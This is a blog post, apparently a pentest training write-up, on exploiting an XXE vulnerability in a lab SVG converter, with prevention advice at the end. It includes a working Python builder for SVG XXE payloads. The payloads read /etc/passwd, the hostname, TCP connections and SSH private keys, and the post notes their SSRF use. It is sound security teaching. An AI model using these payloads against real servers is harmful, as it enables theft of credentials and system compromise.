What to Do with an XXE Vulnerability?!

Nairuz Abulhul
Published in R3d Buck3T
5 min read · Jan 14, 2021

Enumeration, Data Exfiltration, and SSRF Attacks

I am currently taking the Web Application Bootcamp by Vivek Ramachandran from Pentester Academy to refresh my testing skills for the OWASP Top 10 vulnerabilities. What better way to end the “unpredictable” year, right?!

I decided to share the testing methodology I developed while taking the class and solving the challenges.

Today, I will explore the XML External Entity vulnerability, aka XXE, and how we can leverage it to perform data exfiltration and SSRF attacks.

Before we dive into it, let’s cover the fundamentals.

💭$_Key_Concepts:

  • XML External Entity Attack Overview
  • Impact
  • Exploitation Demo
  • Prevention
  • Resources

$_XML_External_Entity_Attack:

XML is a markup language designed for storing and transporting data. It is commonly used in configuration files and web services, and it uses tags similar to HTML.

An XXE attack targets an application that parses XML input without security checks or validation. The attacker declares XML external entities that make the parser retrieve content from internal or external resources.
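
To make the idea of an external entity concrete, here is a minimal sketch in Python. The sample document and the function name `external_entities` are my own illustration, not part of the lab. It only lists the external entities a document declares, using the standard library's expat bindings. No external-entity handler is installed, so nothing is fetched from disk or the network.

```python
from xml.parsers import expat

# Hypothetical sample: the DOCTYPE declares an external entity named "xxe"
# and the document body references it with &xxe;.
SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE note [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<note>&xxe;</note>"""


def external_entities(xml_text):
    """Return (name, system_id) pairs for every external entity declared."""
    found = []

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        # External entities carry a system identifier instead of a value.
        if system_id is not None:
            found.append((name, system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found
```

A vulnerable parser would go one step further and replace `&xxe;` with the contents of the referenced resource, which is what the attack relies on.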

🔥$_Impact

  • Reading confidential data residing on the local system.
  • Performing server-side request forgery (SSRF) attacks, in which an attacker makes the vulnerable server send requests to retrieve information that is only available to that server.
  • Conducting local port scanning.
  • Exfiltrating sensitive information such as SSH keys and configuration files that lead to full system compromise.

😈$_Exploitation_Time

I chose a vulnerable SVG Converter application on AttackDefense Lab to demonstrate the XXE vulnerability and its impact.

When testing a web application, I try to collect as much information about the application as possible, either by manually looking through the application’s page source, comments, and hidden endpoints, or by intercepting the requests with a proxy to investigate the server’s responses further.

At first sight, the application expects the user to upload an SVG image file and converts it to either PNG or PDF format. SVG stands for Scalable Vector Graphics, a file format for displaying vector images on the web.

🔎$_My_Enumeration_steps:

  • Inspect all visible URLs.
  • View the page source and look for hidden comments, API endpoints, and storage locations.
  • Check the enabled HTTP methods.
  • Gather information, if possible, through the server headers about the running infrastructure, application language, and used technologies.
  • Manually fuzz the application and observe the responses carefully with Burp Suite.
  • Inspect the type of data sent between the client and the application. Figuring out the data type narrows down the possible attack types.
  • Intentionally generate error messages to see if the application will show visible errors disclosing some interesting information that helps us understand its structure.
  • Automate the discovery of directories and endpoints.
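
Two of the steps above, checking the enabled HTTP methods and reading the server headers, can be sketched with the Python standard library. This is only an illustration: the function names, the list of headers worth looking at, and the target URL in the usage note are assumptions of mine, and in the lab I did this by hand in Burp Suite.

```python
import urllib.error
import urllib.request

# Headers that often reveal the infrastructure, language, or allowed methods.
# This selection is an assumption, adjust it to the target.
INTERESTING = ("server", "x-powered-by", "allow", "via", "content-type")


def fetch_headers(url, method="OPTIONS", timeout=5.0):
    """Send one request and return the response headers as a dict."""
    request = urllib.request.Request(url, method=method)
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return dict(response.headers.items())
    except urllib.error.HTTPError as error:
        # Error responses (4xx/5xx) still carry headers worth reading.
        return dict(error.headers.items())


def fingerprint(headers):
    """Keep only the headers that hint at the running stack."""
    lowered = {name.lower(): value for name, value in headers.items()}
    return {name: lowered[name] for name in INTERESTING if name in lowered}
```

Usage would look like `fingerprint(fetch_headers("http://target.example/"))`, where the URL is a placeholder for the application under test.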

Going through the above enumeration steps, I uploaded an SVG file as the application expected and intercepted the request for analysis. The request body is JSON and has three values: data, export_as, and headers.

I fuzzed each parameter to determine which one accepts XML data and sends it to the server for parsing.

The data parameter is the only parameter that accepts XML input, and export_as works only with PDF value; PNG throws errors.
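
The parameter-by-parameter fuzzing can be sketched as follows. The three keys come from the intercepted request, but the baseline values, the probe string, and the function name are assumptions for illustration. I did the actual fuzzing manually in Burp Suite.

```python
import json

# Keys match the intercepted request; the values are placeholders.
BASELINE = {
    "data": '<svg xmlns="http://www.w3.org/2000/svg"/>',
    "export_as": "pdf",
    "headers": {},
}

# A harmless XML marker used to see which parameter reaches the XML parser.
XML_PROBE = '<?xml version="1.0"?><probe>xxe-test</probe>'


def fuzz_variants(baseline, probe):
    """Yield (parameter, json_body) with one parameter replaced at a time."""
    for parameter in baseline:
        mutated = dict(baseline)      # copy so the baseline stays untouched
        mutated[parameter] = probe
        yield parameter, json.dumps(mutated)
```

Sending each body and comparing the responses shows which parameter is handed to the parser.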

Then I mapped the information I gathered against additional research on XML attacks. The likely vector was XXE: injecting an XML payload into an SVG file so that it is processed when the server parses the SVG.

I used one of the XML/SVG payloads from PayloadsAllTheThings on GitHub to confirm the vulnerability. I started with the well-known /etc/passwd file to retrieve the server’s accounts.

$_XML_Payloads

Below are multiple payloads to use for retrieving different types of information:

  • Retrieve the hostname
  • Read /etc/passwd file
  • Check the server internal open ports
  • Retrieve SSH Private Keys

[Screenshots: host name payload, /etc/passwd payload, open ports payload, SSH private key payload]
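
As a rough text version of these payloads, the sketch below builds an SVG document that declares one external entity and prints it inside a text element, modeled on the general shape of the SVG XXE payloads in PayloadsAllTheThings. The exact file paths are assumptions: I use /etc/hostname for the host name and /proc/net/tcp for the TCP connections, and the SSH key location depends on which user's home directory you find in /etc/passwd.

```python
# SVG wrapper: the DOCTYPE declares the entity, the <text> element prints it.
SVG_XXE_TEMPLATE = """<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{uri}"> ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" version="1.1">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>"""

# Assumed locations on a typical Linux host.
TARGETS = {
    "hostname": "file:///etc/hostname",
    "passwd": "file:///etc/passwd",
    "open_ports": "file:///proc/net/tcp",
}


def build_svg_xxe(uri):
    """Return an SVG payload whose entity points at the given URI."""
    if '"' in uri:
        raise ValueError("URI must not contain a double quote")
    return SVG_XXE_TEMPLATE.format(uri=uri)


def ssh_key_uri(home_directory):
    """Guess the private key path for a home directory (assumed id_rsa)."""
    return "file://" + home_directory.rstrip("/") + "/.ssh/id_rsa"
```

For example, `build_svg_xxe(TARGETS["passwd"])` gives the payload for the users file. Passing an `http://` URI instead of a `file://` one turns the same payload into an SSRF request.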

As you see, with the above payloads, we are able to get back the sensitive contents from the server:

  • Hostname ✔️
  • Users file [passwd] ✔️
  • Current TCP connections to detect open ports ✔️
  • SSH private key ✔️
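
The TCP connection table comes back as hex, so it needs decoding before the open ports are readable. Below is a minimal sketch, assuming the table was read from /proc/net/tcp on a Linux host. The function name and the sample rows are made up for illustration.

```python
from typing import List

# Invented sample in /proc/net/tcp layout; addresses and ports are in hex.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 20001
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 20002
   2: 0F00000A:0050 0100000A:C350 01 00000000:00000000 00:00000000 00000000     0        0 20003
"""

LISTEN_STATE = "0A"  # socket state code for LISTEN


def listening_ports(proc_net_tcp: str) -> List[int]:
    """Return the sorted decimal ports of all sockets in LISTEN state."""
    ports = set()
    for line in proc_net_tcp.splitlines():
        fields = line.split()
        # Data rows start with an index such as "0:"; skip everything else.
        if len(fields) < 4 or not fields[0].endswith(":"):
            continue
        local_address, state = fields[1], fields[3]
        if state == LISTEN_STATE:
            hex_port = local_address.rsplit(":", 1)[1]
            ports.add(int(hex_port, 16))
    return sorted(ports)
```

Rows in any other state, such as an established connection, are ignored because they do not tell us which services are listening.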

Of course, with the SSH private key, we gain a foothold on the server and can go on to fully compromise it.

$_Prevention

  • Sanitize XML data before trusting it.
  • Disable external entity and DTD processing altogether if possible.
  • Update XML libraries regularly.
  • Limit egress connections from the application (trusted destinations only).
  • And, of course, implement a WAF in front of the web application.
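
Disabling DTD processing can be sketched with the Python standard library alone. This is one possible approach under my own assumptions, not what the lab application uses: a first pass with expat rejects any document that carries a DOCTYPE declaration, and only then is the input handed to ElementTree. The names `DTDForbidden` and `safe_parse` are hypothetical.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when the input contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Entities are declared inside the DTD, so refusing the DOCTYPE
    # blocks external entities before any of them can be declared.
    raise DTDForbidden("DOCTYPE declarations are not allowed: " + name)


def safe_parse(xml_text):
    """Parse XML into an Element, refusing any document with a DTD."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_text, True)   # raises DTDForbidden on a DOCTYPE
    return ET.fromstring(xml_text)
```

A plain SVG upload still parses, while any payload that needs a DOCTYPE to declare its entity is refused up front.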

That would be it for today. Thanks a lot for reading !!!

Nairuz Abulhul
R3d Buck3T

I spend 70% of the time reading security stuff and 30% trying to make it work !!! aka Pentester [+] Publication: R3d Buck3T